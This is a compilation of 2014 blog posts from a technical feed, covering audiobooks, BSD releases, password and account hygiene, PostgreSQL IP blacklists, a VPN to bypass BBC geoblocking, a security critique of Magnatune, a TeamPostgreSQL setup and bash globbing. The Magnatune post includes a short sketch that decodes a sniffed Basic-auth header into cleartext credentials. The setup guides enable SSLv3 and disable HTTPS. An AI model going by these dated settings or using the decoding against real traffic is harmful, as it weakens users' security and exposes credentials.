by Flameeyes via Flameeyes's Weblog »

In one of my previous posts I have noted I'm an avid audiobook consumer. I started when I was at the hospital, because I didn't have the energy to read — and most likely, because of the blood sugar being out of control after coming back from the ICU: it turns out that blood sugar changes can make your eyesight go crazy; at some point I had to buy a pair of €20 glasses simply because my doctor prescribed me a new treatment and my eyesight ricocheted out of control for a week or so.

Nowadays, I have trouble sleeping if I'm not listening to something, and I end up with the Audible app installed in all my phones and tablets, with at least a few books preloaded whenever I travel. Of course, as I said, I keep the majority of my audiobooks on the iPod, and the reason is that while most of my library is on Audible, not all of it is. There are a few books that I bought on iTunes before finding out about Audible, and then there are a few I received in CD form, including The Hitchhiker's Guide To The Galaxy Complete Radio Series, which is among my favourite playlists.

Unfortunately, to be able to convert these from CD to a format that the iPod could digest, I ended up having to buy a piece of software called Audiobook Builder for Mac, which allows you to rip CDs and build M4B files out of them. What's M4B? It's the usual mp4 format container, just with an extension that makes iTunes consider it an audiobook, and with chapter markings in the stream. At the time I first ripped my audiobooks, ffmpeg/libav had no support for chapter markings, so that was not an option. I've been told that said support is there now, but I have not tried getting it to work.

Indeed, what I need to find out is how to build an audiobook file out of a string of mp3 files, and I have no idea how to do that now that I no longer have access to my personal iTunes account on a Mac to re-download Audiobook Builder and process them. In particular, the mp3s that I'm looking to merge together are the years 2013 and 2014 of BBC's The News Quiz, to which I'm addicted and listen to continuously. Being able to join them all together so I can listen to them in a multi-day-running playlist is one of the very few things that still lets me sleep relatively calmly — I say relatively because I can't remember the last time I slept soundly; it's been about a year by now.

Essentially, what I'd like is for Audible to let me sideload some content (the few books I did not buy from them, and the News Quiz series that I stitch together from the podcast), and create a playlist — then as far as I'm concerned I wouldn't have to use an iPod at all. Well, besides the fact that I'd have to find a way to silence notifications while playing audiobooks. Having Dragons of Autumn Twilight interrupted by the Facebook notification pop is not something I look forward to most of the time. And in some cases I have even had a background update disrupt my playback, so there is definitely room for improvement.

PC-BSD at Fossetcon

by dru via Official PC-BSD Blog »

Fossetcon will take place September 11–13 at the Rosen Plaza Hotel in Orlando, FL. Registration for this event ranges from $10 to $85 and includes meals and a t-shirt.

There will be a BSD booth in the expo area on both Friday and Saturday from 10:30–18:30. As usual, we’ll be giving out a bunch of cool swag, PC-BSD DVDs, and FreeNAS CDs, as well as accepting donations for the FreeBSD Foundation. Dru Lavigne will present “ZFS 101” at 11:30 on Saturday. The BSDA certification exam will be held at 15:00 on Saturday.

PC-BSD 10.0.3 Quarterly Package Update Released

by dru via Official PC-BSD Blog »

The PC-BSD team is pleased to announce the availability of the next PC-BSD quarterly package update, version 10.0.3!

This update includes a number of important bug fixes, as well as newer packages and desktops, such as Chromium 37.0.2062.94, Cinnamon 2.2.14, Lumina 0.6.2 and more. This release also includes a CD-sized ISO of TrueOS, for users who want to install a server without X. For more details and updating instructions, refer to the notes below.

We are already hard at work on the next major release of PC-BSD, 10.1, due later this fall, which will include FreeBSD 10.1-RELEASE under the hood. Users interested in following along with development should sign up for our Testing mailing list.

PC-BSD Notable Changes

* Cinnamon 2.2.14
* Chromium 37.0.2062.94
* NVIDIA Driver 340.24
* Lumina desktop 0.6.2-beta
* Pkg 1.3.7
* Various fixes to the Appcafe Qt UI
* Bugfixes to Warden / jail creation
* Fixed a bug with USB media not always being bootable
* Fixed several issues with Xorg setup
* Improved Boot-Environments to allow “beadm activate” to set default
* Support for jail “bulk” creation via Warden
* Fixes for relative ZFS dataset mount-point creation via Warden
* Support for full-disk (GELI) encryption without an unencrypted /boot partition

TrueOS

Along with our traditional PC-BSD DVD ISO image, we have also created a CD-sized ISO image of TrueOS, our server edition.

This is a text-based installer which includes FreeBSD 10.0-Release under the hood. It includes the following features:

* ZFS on Root installation
* Boot-Environment support
* Command-Line versions of PC-BSD utilities, such as Warden, Life-Preserver and more.
* Support for full-disk (GELI) encryption without an unencrypted /boot partition

We have some additional features also in the works for 10.1 and later, stay tuned this fall for more information.

Updating

Due to some changes with how pkgng works, it is recommended that all users update via the command-line using the following steps:

# pkg update -f
# pkg upgrade pkg
# pkg update -f
# pkg upgrade
# pc-extractoverlay ports
# reboot

PKGNG may need to re-install many of your packages to fix an issue with shared library version detection. If you run into issues doing this, or have conflicts, please open a bug report with the output of the above commands.

If you run into shared library issues running programs after upgrading, you may need to do a full-upgrade with the following:

# pkg upgrade -f

Getting media

10.0.3 DVD/USB media can be downloaded from this URL via HTTP or Torrent.

Reporting Bugs
Found a bug in 10.0.3? Please report it (with as much detail as possible) to our new RedMine Database.

Account churn

by Flameeyes via Flameeyes's Weblog »

In my latest post I singled out one of the worst security experiences I’ve had with a service, but that is far from the only bad experience I've had. Indeed, given that I’ve been actively hunting down my old accounts and trying to get my hands on them again, I can tell you that I have plenty of material to fill books with bad examples.

First of all, there is the problem of migrating the email addresses. For the longest time I’ve been using my GMail address to register everywhere, but then I decided to migrate to my own domain (especially since Gandi supports two-factor authentication, which makes it much safer). Unfortunately that means that not only do I have a bunch of accounts still on the old email address, but I also have duplicate accounts.

Duplicate accounts become even trickier when you consider that I used to have my own company, which meant I had double accounts for services that did not allow me to order sometimes with a VAT ID attached and sometimes without. Sometimes I could close the accounts (once I dropped the VAT ID), and sometimes I couldn’t, so a good deal of them are still out there.

Finally, there are the services that are available in multiple countries but with country-specific accounts. Which, don’t be mistaken, does not mean that every country has its own account database! It simply means that a given account is assigned to a country and does not work in any other. In most cases you cannot even migrate your account across countries. This is the case, for instance, of OVH (and why I moved to Gandi), but also of PayPal (where the billing address is tied to the country of the account and can’t be changed), IKEA and -PSN- Sony Online Entertainment. The end result is that I have duplicated (or even triplicated) accounts to cover the fact that I have lived in multiple countries by now.

Also, it turns out that I completely forgot how many services I registered to over the years. Yes I have the passwords as stored by Chrome, but that’s not a comprehensive list as some of the most critical passwords have never been saved there (such as my bank’s password), plus some websites I have never used in Chrome, and at some point I had it clean the history of passwords and start from scratch. Some of the passwords have been saved in sgeps so I could look them up there, but even those are not a complete list. I ended up looking in my old email content to figure out which accounts I forgot having. The results have been fun.

But what about the grievances? Some of the accounts I wanted to regain access to ended up being blocked or deleted; I'm surprised by the number of services that were either killed or moved around. At least three ebook stores I used are now gone, two of which were absorbed by Kobo, while Marks & Spencer refused to recognize my email as valid; I assume they reset their user database at some point or something. Some of the hotel loyalty programs I signed up for and used once or twice have disappeared, or were renamed or merged into something else. Not a huge deal, but it makes account management a fun problem.

Then there are the accounts whose passwords got invalidated in the meantime, so even if I have a copy, it’s useless. Given that I had not logged into some accounts for years, that’s fair enough: between leaks, Heartbleed, and the overdue changes in best practices for password storage, I am more bothered by the services that did not invalidate my password in the meantime. But then again, there are different ways to deal with it. Some services, when you try to log in with the previous password, point out that it’s no longer valid and proceed with the usual forgotten-password workflow. Others will send you the password by email in plain text.

One quite egregious case happened with an Italian electronics shop, one of the first online-only stores I know of in Italy. Somehow, I knew that the account was still active, mostly because I could see their newsletter in the spam folder of my GMail account. So I went and asked for the password back, to change the address and stop the newsletter too (given I don’t live in Italy any longer), and they sent me back the user ID and password in cleartext. They had reset their passwords in the meantime, and the default password became my Italian tax ID. Not very safe: if I knew anyone else's user ID, getting their tax ID would be easy, as it can be calculated from a few personal, but not so secret, details (full name, sex, date and city of birth).

But there is something worse than unannounced password resets: the dance of generating a new password. I now have the impression that only a minority of services actually allow you to use whichever password you want. Lots of the services I changed passwords for between last night and today required me to disable non-alphanumeric symbols, because either they don't support any non-alphanumeric character, or they only support a subset that LastPass does not let you select.

But this is not as bothersome as password length limits. Most sites will be happy to tell you that they require a minimum of 6 or 8 characters for your password — few will tell you upfront the maximum length. And very few of those that don't tell you right away will make up for it by telling you, when the password is too long, how long it can be. I even found sites that simply error out on you when you try to use a password that is not valid, and decide to invalidate both your old and temporary passwords while not accepting the new one. It's a serious pain.

Finally, I've enabled 2FA for as many services as I could; some of it is particularly bothersome (LinkedIn, I'll probably write more about that), but at least it's an extra layer of safety. Unfortunately, I still find it extremely bothersome that neither Google Authenticator nor Red Hat's FreeOTP (last time I tried) supports backing up the private keys of the configured OTPs. Since I switched between three phones in the past three months, I could have used some help when having to re-enroll my OTP generators — I upgraded my phone, then had to downgrade because I broke the screen of the new one.

Of Dolphins and Elephants in the Network

by Jesco Freund via My Universe »

Yesterday I made the bold claim that there are technical reasons to prefer PostgreSQL over MySQL or MariaDB. Today I want to try to back that up with a practical example. For this I picked out PostgreSQL's ability to handle network addresses.

As a practical use case, consider a database-backed blacklist used, for example, by a proxy, spam filter or similar. The querying application only cares about one question: is a given IP address blocked by the blacklist or not? However, the blacklist should be able to hold not only individual hosts but also network segments (e.g. 192.168.0.0/24 or 2001:db8::/64).

The Elephant

PostgreSQL ships two native data types for IP addresses, inet and cidr. The former is the more flexible of the two and can handle both networks and hosts. The accompanying operators are particularly useful; especially the containment operators <<, <<=, >> and >>= turn the task at hand into child's play.

A suitable table with a sequential numeric ID, a description and a timestamp can be created in PostgreSQL with the following SQL statement:

CREATE TABLE acl_blacklist (  
    id serial PRIMARY KEY,
    ip inet,
    description character varying(255),
    created timestamp with time zone DEFAULT LOCALTIMESTAMP
);
To play around with the blacklist a bit, we insert two example networks and one host:

INSERT INTO acl_blacklist (ip, description) VALUES  
    ('192.168.0.0/24', 'My evil IPv4 net'),
    ('2001:db8::/64', 'My evil IPv6 net'),
    ('10.0.1.5', 'My evil IPv4 host');
The table's contents now look like this:

 id |       ip       |    description    |            created            
----+----------------+-------------------+-------------------------------
  1 | 192.168.0.0/24 | My evil IPv4 net  | 2014-09-07 13:36:28.718252+02
  2 | 2001:db8::/64  | My evil IPv6 net  | 2014-09-07 13:36:28.718252+02
  3 | 10.0.1.5       | My evil IPv4 host | 2014-09-07 13:36:28.718252+02
Whether or not an IP address is blocked by the blacklist can be determined with a short SQL statement:

SELECT 1 FROM acl_blacklist WHERE '192.168.0.1' <<= acl_blacklist.ip;  
This query returns the following result:

 ?column? 
----------
        1
(1 row)
With an IP address that is not blocked by the blacklist (e.g. 192.168.1.1), the result looks like this:

 ?column? 
----------
(0 rows)
This works with IPv6 addresses too, of course:

SELECT 1 FROM acl_blacklist WHERE '2001:db8::5' <<= acl_blacklist.ip;  
 ?column? 
----------
        1
(1 row)
SELECT 1 FROM acl_blacklist WHERE '2001:db8:1::5' <<= acl_blacklist.ip;  
?column? 
----------
(0 rows)

The Dolphin

MySQL has no native data type for IP addresses. With the help of built-in functions, a workaround can still be built that provides functionality comparable to PostgreSQL's. However, the check has to be done separately for IPv4 and IPv6; the example is therefore limited to IPv4.

Analogous to PostgreSQL, we first create a blacklist table:

CREATE TABLE `acl_blacklist` (  
    `id` serial PRIMARY KEY,
    `ip` varchar(16) NOT NULL,
    `mask` tinyint(3) unsigned NOT NULL,
    `description` varchar(255) NOT NULL,
    `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP
);
IP address and netmask are stored in separate columns here. That way, the INET_ATON function can later be used to achieve a query result comparable to PostgreSQL's.

Here, too, we insert a host and a network into the table for testing purposes:

INSERT INTO `acl_blacklist` (`ip`, `mask`, `description`) VALUES  
    ('192.168.0.0', 24, 'My evil IPv4 net'),
    ('10.0.1.5', 32, 'My evil IPv4 host');
The table now looks as follows:

+----+-------------+------+-------------------+---------------------+
| id | ip          | mask | description       | created             |
+----+-------------+------+-------------------+---------------------+
|  1 | 192.168.0.0 |   24 | My evil IPv4 net  | 2014-09-07 14:15:21 |
|  2 | 10.0.1.5    |   32 | My evil IPv4 host | 2014-09-07 14:15:21 |
+----+-------------+------+-------------------+---------------------+
So far the differences from PostgreSQL are limited. The query to check whether an IP is blocked by the blacklist, however, turns out to be considerably more complex than in PostgreSQL:

SELECT 1 FROM `acl_blacklist` WHERE  
    SUBSTRING(LPAD(BIN(INET_ATON('192.168.0.1')), 32, 0), 1, `acl_blacklist`.`mask`) = 
    SUBSTRING(LPAD(BIN(INET_ATON(`acl_blacklist`.`ip`)), 32, 0), 1, `acl_blacklist`.`mask`);
The result looks exactly the same as under PostgreSQL (apart from formatting specifics of the respective command line interfaces):

+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)  
With an IP address that is not blocked by the blacklist (e.g. 192.168.1.1), the result looks like this:

Empty set (0.00 sec)  
Incidentally, IPv6 support could still be added by extending the WHERE condition of the query with an OR clause that uses the IPv6-specific function INET6_ATON. In addition, the column holding the IP address would then have to be sized accordingly larger.

Conclusion

At least in this discipline the elephant beats the dolphin, and not only in terms of complexity and ease of handling but, interestingly, also in query performance. The reason is probably that PostgreSQL's operators are backed by a fast internal implementation, while the nested function calls in MySQL inevitably cause a performance penalty.

Bypassing Geolocation …

by Jeremy Olexa via jOlexa.net »

By now we all know that it is pretty easy to bypass geolocation blocking with a web proxy or VPN service. After all, there are over 2 million Google results for “bbc vpn” … and I wanted to do just that to view a BBC show on privacy and the dark web.

I wanted to set this up as cheaply as possible but not use a service that I had to pay for a month since I only needed one hour. This requirement directed me towards a do-it-yourself solution with an hourly server in the UK. I also wanted reproducibility so that I could spin up a similar service again in the future.

My first attempt was to route my browser through a local SOCKS proxy via ssh tunneling, ssh -D 2001 user@uk-host.tld. That didn’t work because my home connection was not good enough to stream from BBC without incessant buffering.

Hmm, if this simple proxy won’t work, that strikes out many other ideas; I needed a way to use the BBC iPlayer Downloader to view content offline. Ok, but the software doesn’t have native proxy support (naturally). Maybe you could somehow use TOR and set the exit node to the UK, but that seems like a poor/slow idea.

I ended up routing all my traffic through a personal OpenVPN server in London, then downloaded the show via the BBC software and watched it in HD offline. The goal was to provision the VPN as quickly as possible (time is money). A StackScript is a feature that Linode offers: a user-defined script run at the first boot of your host. Surprisingly, no one had published one to install OpenVPN yet. So I did: “Debian 7.5 OpenVPN” – feel free to use it on the Linode service to boot up a VPN automatically. It takes about two minutes to boot, install, and configure OpenVPN this way. Then you download the ca.crt and client configuration from the newly provisioned server and import them into your client.

End result: It took 42 minutes for me to download a one hour show. Since I shut down the VPN within an hour, I was charged the Linode minimum, $.015 USD. Though I recommend Linode (you can use my referral link if you want), this same concept applies to any provider that has a presence in the UK, like Digital Ocean who charges $.007/hour.

Addendum: Even though I abandoned my first attempt, I left the browser window open and it continued to download even after I was disconnected from my UK VPN. I guess BBC only checks your IP once then hands you off to the Akamai CDN. Maybe you only need a VPN service for a few minutes?

I also donated money to a BBC-sponsored charity to offset some of my bandwidth usage and freeloading of a service that UK citizens have to pay for; I encourage you to do the same. For reference, the BBC costs a UK household about $.02 USD in tax per hour. (source)

Anatomy of a security disaster

by Flameeyes via Flameeyes's Weblog »

I have made a note of this in my previous post about Magnatune being terribly insecure. Those who follow me on Twitter or Google+ already got the full details of it but I thought I would repeat them here. And add a few notes about that.

I remember Magnatune back in the days when I hung around #amarok and helped with small changes here and there, and bigger changes for xine itself. At the time it was often used as an example of a good DRM-less service. Indeed, it sold DRM-free music way before Apple decided to drop its own music DRM, and it's still one of the few services selling lossless music — if we exclude Humble Bundle and game OSTs.

But then again, this is not a license to have terrible security, which is what Magnatune has right now. After naming Magnatune in the aforementioned post I realized that I had not given it a new, good password; instead it was still using one of my old passwords, which are all insecure by themselves: a bit too short and possibly susceptible to dictionary attacks. I was not even sure whether it was using the password I used by default on many services before, which is of course terrible, and was most likely leaked at multiple points in time — at least my old Adobe account was involved in their big leak.

As I said before, I stopped using fixed passwords some time last year, and then I decided to jump on LastPass when Heartbleed required me to change passwords almost everywhere. But it takes a while to change passwords in all your accounts, especially when you forget about some accounts altogether, like the Magnatune one above.

So I went to the Magnatune website to change my password, but of course I had forgotten what the original was, so I decided to follow the forgotten-password procedure. The first problem happens here: it does not require me to know which email address I registered with; instead it (alternatively) asks for a username, which is quite obvious (Flameeyes, what else? There are very few sites where I use a different username, one of which is Tumblr, and that's usually because Flameeyes is taken). When I type that in, it actually shows me, on the web page, the email address I'm registered with.

What? This is a basic privacy issue: if it weren't for the fact that I don't vary my email addresses that much, an attacker could now find an otherwise private email address. Worse yet, by using the usernames available in previous dumps, it's possible to match them to email addresses, too. Indeed, a quick check provided me with at least one email address of a friend of mine just by using her usual username — I already knew the email address, but that shouldn't be a given.

Anyway, I got an email back from Magnatune just a moment later. The email contains the password in plain text, which indicates they store it that way, which is bad practice. A note about plain text passwords: there is no way to prove beyond any doubt that a service is hashing (or hashing and salting) user passwords, but you can definitely prove otherwise. If you receive your password back in plain text when you say you forgot it, then the service does not store hashed passwords. Conversely, even if the service sends you a password reset link instead, it’s still possible it’s storing the plain text password. This is most definitely unfortunate.

Up to here, things would be bad but not that uncommon, as the Plain Text Offenders site linked above would show you — and I have indeed submitted a screenshot of the email to them. But there is one more thing you can find out from the email they sent. You may remember that some months ago I wrote about email security and around the same time so did the Google Official blog – for those who wonder, no, I had no idea that such a post was being written and the similar timing was a complete coincidence – so what's the status of Magnatune? Well, unfortunately it's bleak, as they don't encrypt mail in transit:

Received: from magnatune.com ([64.62.194.219])
        by mx.google.com with ESMTP id h11si9367820pdl.64.2014.08.28.15.47.42
        for <f********@*****.***>;
        Thu, 28 Aug 2014 15:47:42 -0700 (PDT)
If the sending server spoke TLS to the GMail server (yes it’s gmail in the address I censored), it would have shown something like (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); (which appears in the comment messages I receive from my own blog).

Not encrypting the email in transit means that anybody who could sniff the traffic coming out of Magnatune's server would be able to access any of their customers' accounts: they just need to snoop the email traffic and they can collect all the passwords. Luckily, the email server from which the email arrived is hosted at a company I trust very much, as I'm their customer too.

So I tried logging in with my username and newly-reminded password, unfortunately my membership expired years ago, which means I get no access at all — so I can’t even change my password or my email address. Too bad. But then it allowed me to figure out some more problems with the security situation of Magnatune.

When you try to log in, you get sent to a different website depending on which kind of membership you subscribe(d) to. In my case I got the download membership — when you go there, you get presented with a dialog from your browser requesting username and password. It's standard HTTP-based authentication. It's not very common because it's not really user friendly: you can't serve any content until the user either enters the right username/password or decides they don't know a valid combination and cancels the dialog, in which case a final 401 error is reported and whatever content the server sent is displayed by the browser.

Besides the user-friendliness (or lack thereof), HTTP authentication can be tricky, too. There are two ways to provide authentication over HTTP, Basic and Digest — neither is very secure by default. Digest is partially usable, but suffers from a lack of authentication of the parties, making MitM attacks trivial, while Basic, well, allows a sniffer to figure out username and password as they travel in plaintext over the wire. HTTP authentication is, though, fairly secure if you use it in conjunction with TLS. Indeed, for some of my systems I use HTTP authentication over an HTTPS connection, as it allows me to configure the authentication at the web server level without support from the application itself.

What became obvious to me while failing to log in to Magnatune was that the connection was not secure: it was trying to get me to log in over cleartext HTTP. So I checked the headers to figure out which kind of authentication it was doing. At this point I almost have to say “of course”: it is using Basic authentication, i.e. cleartext username and password on the wire. This is extremely troublesome.
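
To show just how little Basic authentication hides on its own, this is all an eavesdropper has to do with a captured Authorization header (a Python sketch; the credentials are made up):

import base64

# An "Authorization: Basic ..." header sent over plain HTTP is just the
# base64 encoding of "username:password"; no secret is involved.
header_value = "Basic " + base64.b64encode(b"someuser:s3cr3t").decode("ascii")

scheme, _, encoded = header_value.partition(" ")
print(scheme)                                     # Basic
print(base64.b64decode(encoded).decode("ascii"))  # someuser:s3cr3t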

While the unencrypted email keeps the attack surface relatively limited – it is mostly a matter of someone sniffing at the datacenter where Magnatune is hosted (assuming you use an email provider that is safe or trustworthy enough; I consider mine so) – using Basic authentication extends the surface immensely. Indeed, if you're logging in to Magnatune from a coffee shop or any other public open WiFi, you are literally broadcasting your username and password over the network.

I can’t know if you can change your Magnatune password once you can log in, since I can’t log in. But I know that the alternative to the download membership is the streaming membership, which makes it very likely that a Magnatune user would be logging in while at a Starbucks, so that they can work on some blog post or on source code of their mobile app while listening to music. I would hope they used a different password for Magnatune than for their email address — since as I noted above, you can get to their email address just by knowing their username.

I don't worry too much. My Magnatune password turned out to be different enough from most of my other passwords that even if I don't change it and it gets leaked, it won't compromise any other service. Even more so now that I'm actively gathering all my accounts and changing their passwords.

Elephant House

by Jesco Freund via My Universe »

There are numerous technical reasons why one might want to prefer PostgreSQL over another RDBMS such as MySQL or MariaDB; in the end, however, it comes down to the use case, which is why there can also be good reasons for MySQL & Co (such as read speed) as well as less good ones (such as Wordpress' fixation on MySQL).

There is also a weighty non-technical argument for the blue elephant: Monty & Co have decided to at least partially break compatibility with MySQL in MariaDB 10, and at the moment it is hard to predict which of the two database systems will prevail in the long run, let alone how applications will deal with the incompatibilities, which will in all likelihood keep growing.

Anyone who wants to switch to PostgreSQL, for whatever reason, will sooner or later ask for a decent web-based administration interface; after all, MySQL has a fairly mature tool in phpMyAdmin. The standard answer is usually phpPgAdmin, a tool that by now looks rather dated and whose development appears to progress rather sluggishly.

A really good alternative is TeamPostgreSQL, which offers a modern, AJAX-based interface and brings plenty of useful features, such as an SQL editor with auto completion or in-line editing of records. The only downside: it is a Java web application, which supposedly makes deployment complicated, especially since the software currently lacks any documentation.

That is not really the case, though. For a solid production system, however, you should not use the built-in Jetty container but a "grown-up" servlet container such as Apache Tomcat. On FreeBSD it can be installed comfortably via pkg, including its dependencies. TeamPostgreSQL then (almost) installs itself…

pkg ins tomcat8

cat >> /etc/rc.conf << EOF  
tomcat8_enable="YES"  
EOF

cd ~  
fetch http://cdn.webworks.dk/download/teampostgresql_multiplatform.zip  
unzip teampostgresql_multiplatform.zip  
cd teampostgresql  
cp -r webapp /usr/local/apache-tomcat-8.0/webapps/  
cd /usr/local/apache-tomcat-8.0/webapps/  
mv webapp teampostgresql  
chown -R www:www teampostgresql  
mkdir -p /usr/local/apache-tomcat-8.0/work/Catalina/localhost/teampostgresql  
chown www:www /usr/local/apache-tomcat-8.0/work/Catalina/localhost/teampostgresql  
All that is missing now is a usable configuration for TeamPostgreSQL. It goes into the file webapps/teampostgresql/WEB-INF/teampostgresql-config.xml (a file with default values is already present and only needs to be updated):

<?xml version="1.0" encoding="UTF-8"?>  
<config xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="config">  
    <adminuser>myadmin</adminuser>
    <adminuserpassword>t0ps3cr3t</adminuserpassword>
    <anonymousaccess>10</anonymousaccess>
    <anonymousprofile>0</anonymousprofile>
    <datadirectory>/usr/local/apache-tomcat-8.0/work/Catalina/localhost/teampostgresql</datadirectory>
    <https>DISABLED</https>
</config>  
Now Tomcat can be started:

service tomcat8 start  
From now on, TeamPostgreSQL should be reachable under /teampostgresql. If you want to give the tool its own subdomain and are already running a reverse proxy anyway, a configuration like the following can be used:

<VirtualHost [2001:db8::1]:80>  
    ServerName pgsql.example.com
    ErrorLog /var/log/pgsql-error.log
    CustomLog /var/log/pgsql-access.log combined
    ServerAdmin webmaster@example.com

    RewriteEngine on
    RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [L,R=permanent]

    ProxyRequests Off
    <Proxy *>
        Require all denied
    </Proxy>
</VirtualHost>

<VirtualHost [2001:db8::1]:443>  
    ServerName pgsql.example.com
    ErrorLog /var/log/pgsql-error-ssl.log
    CustomLog /var/log/pgsql-access-ssl.log "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %>s %b \"%{cache-status}e\" \"%{User-Agent}i\""
    ServerAdmin webmaster@example.com

    SSLEngine On
    SSLProtocol -ALL +SSLv3 +TLSv1 +TLSv1.1 +TLSv1.2
    SSLCipherSuite ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:!RC4:HIGH:!MD5:!aNULL:!EDH
    SSLHonorCipherOrder on
    SSLCompression off
    SSLCertificateFile "/usr/local/etc/ssl/cert/server-cert.pem"
    SSLCertificateKeyFile "/usr/local/etc/ssl/keys/server-key.pem"
    SSLCertificateChainFile "/usr/local/etc/ssl/ca/server-ca.pem"
    Header add Strict-Transport-Security "max-age=15768000"
    ServerSignature Off

    ProxyTimeout 25
    ProxyRequests Off
    ProxyPass / http://127.0.0.1:8080/teampostgresql/
    ProxyPassReverse / http://127.0.0.1:8080/teampostgresql/
    ProxyPreserveHost On
</VirtualHost>  
This makes it possible to stop exposing Tomcat to the outside world altogether and to additionally protect the web application via SSL.
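One way to actually keep Tomcat off the public interfaces is to bind its HTTP connector to the loopback address only. A minimal sketch, assuming the stock server.xml under /usr/local/apache-tomcat-8.0/conf/ (the surrounding attribute values are ordinary Tomcat defaults, not taken from the steps above):

<!-- conf/server.xml (excerpt): listen on 127.0.0.1 only, so the Apache
     reverse proxy above is the sole way in from the outside -->
<Connector port="8080" protocol="HTTP/1.1"
           address="127.0.0.1"
           connectionTimeout="20000"
           redirectPort="8443" />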

Bash pitfalls: globbing everywhere!

by Michał Górny via Michał Górny »

Bash has many subtle pitfalls, some of them being able to live unnoticed for a very long time. A common example of that kind of pitfall is ubiquitous filename expansion, or globbing. What many script writers fail to notice is that practically anything that looks like a pattern and is not quoted is subject to globbing, including unquoted variables.

There are two extra snags that add up to this. Firstly, many people forget that not only asterisks (*) and question marks (?) make up patterns; square brackets ([) do as well. Secondly, by default bash (and POSIX shell) takes failed expansions literally. That is, if your glob does not match any file, you may not even know that you are globbing, as the short session below shows.
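A quick illustration from an interactive shell (the directory contents are made up for the example):

$ ls
ab  foo
$ echo [af]*     # bracket expression plus asterisk: both names match
ab foo
$ echo [xyz]*    # nothing matches: with the defaults, the pattern is passed through literally
[xyz]*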

All it takes for the result to change is running the script in the 'right' directory. Of course, that is often unlikely, maybe even close to impossible, and you can work towards preventing it by running in a safe directory. But in the end, writing predictable software is a fine quality.

How to notice mistakes?

Bash provides two major facilities that can help you catch such mistakes: the shell options (shopt) nullglob and failglob.

The nullglob option is a good choice as a default for your script. After enabling it, failing filename expansions result in no parameters rather than the verbatim pattern itself. This has two important implications.

Firstly, it makes iterating over optional files easy:

for f in a/* b/* c/*; do
    some_magic "${f}"
done
Without nullglob, the above may actually return a/* if no file matches that pattern. For this reason, you would need an additional check for the existence of the file inside the loop. With nullglob, the unmatched arguments are simply omitted; in fact, if none of the patterns match, the loop won't be run even once.

Secondly, it turns every accidental glob that fails to match into nothing. While this isn't the most friendly kind of warning, and may in fact have very undesired results, you are more likely to notice that something is going wrong.

The failglob option is better if you can assume you don't need to match files in its scope. In this case, bash treats every failing filename expansion as a fatal error and terminates execution with an appropriate message.

The main advantage of failglob is that it makes you aware of the mistake before someone hits it the hard way. That is, of course, assuming the accidental pattern doesn't already happen to expand into something.
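As a rough illustration from an interactive shell (file names made up; the exact wording of the error message may differ between bash versions):

$ shopt -s failglob
$ cp dist/*.tar.gz /tmp/
bash: no match: dist/*.tar.gz

The cp is never executed, so the mistake surfaces immediately instead of silently doing the wrong thing.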

There is also a choice of noglob. However, I wouldn't recommend it since it works around mistakes rather than fixing them, and makes the code rely on a non-standard environment.

Word splitting without globbing

One of the pitfalls I noticed myself falling into lately is using unquoted variable substitution to do word splitting. For example:

for i in ${v}; do
    echo "${i}"
done
At first glance, everything looks fine: ${v} contains a whitespace-separated list of words and we iterate over each word. The pitfall is that the words in ${v} are subject to filename expansion. For example, if a lone asterisk happens to be in there (like v='10 * 4'), you'd actually get all the files in the current directory. Unexpected, isn't it?

I am aware of three solutions that can be used to accomplish word splitting without implicit globbing:

  1. setting shopt -s noglob locally,
  2. setting GLOBIGNORE='*' locally,
  3. using the swiss army knife of read to perform word splitting.
Personally, I dislike the first two since they require set-and-restore magic, and the latter also has the penalty of doing the globbing and then discarding the result. Therefore, I will expand on using read:

read -r -d '' -a words <<<"${v}"
for i in "${words[@]}"; do
    echo "${i}"
done
While normally read is used to read from files, we can use bash's here-string syntax to feed the variable into it. The -r option disables backslash escape processing, which is undesired here. -d '' causes read to process the whole input rather than stop at the first delimiter (like a newline). -a words puts the split words into the array ${words[@]}, and since we know how to safely iterate over an array, the underlying issue is solved.
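Applied to the problematic value from before, the asterisk now survives unharmed (a quick interactive check):

$ v='10 * 4'
$ read -r -d '' -a words <<<"${v}"
$ printf '%s\n' "${words[@]}"
10
*
4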

32bit Madness

by Patrick via Patrick's playground »

This week I ran into a funny issue doing backups with rsync:
rsnapshot/weekly.3/server/storage/lost/of/subdirectories/some-stupid.file => rsnapshot/daily.0/server/storage/lost/of/subdirectories/some-stupid.file
ERROR: out of memory in make_file [generator]
rsync error: error allocating core memory buffers (code 22) at util.c(117) [generator=3.0.9]
rsync error: received SIGUSR1 (code 19) at main.c(1298) [receiver=3.0.9]
rsync: connection unexpectedly closed (2168136360 bytes received so far) [sender]
rsync error: error allocating core memory buffers (code 22) at io.c(605) [sender=3.0.9]
Oopsiedaisy, rsync ran out of memory. But ... this machine has 8GB RAM, plus 32GB Swap ?!
So I re-ran this and started observing, and BAM, it fails again. With ~4GB RAM free.

4GB you say, eh? That smells of ... 2^32 ...
For doing the copying I was using sysrescuecd, and then it became obvious to me: All binaries are of course 32bit!

So now I'm doing a horrible hack of "linux64 chroot /mnt/server" so that I have a 64bit environment that does not run out of address space randomly. Plus three new bugs filed for the Gentoo livecd, which fails to appreciate USB and other things.
Who would have thought that a 16TB partition can make rsync stumble over address space limits ...
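For the record, the workaround boils down to something like this (a sketch only; the chroot path is the one from above, and the bind mounts are my assumption about what such a rescue-CD chroot needs):

# give the chroot a working /dev and /proc, then enter the 64bit system on disk
mount -o bind /dev /mnt/server/dev
mount -t proc proc /mnt/server/proc
linux64 chroot /mnt/server /bin/bash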

New Lumina source repo and FreeBSD port

by Ken Moore via Official PC-BSD Blog »

By popular demand, the source tree for the Lumina project has just been moved to its own repository within the main PC-BSD project tree on GitHub.

In addition to this, an official FreeBSD port for Lumina was just committed to the FreeBSD ports tree which uses the new repo.
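For those who want to try it on a plain FreeBSD box, installing from the new port should be the usual routine; a sketch, assuming the port lives at x11/lumina and that binary packages may not have caught up yet:

# build from ports
cd /usr/ports/x11/lumina && make install clean
# or, once packages have been built
pkg install lumina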

 

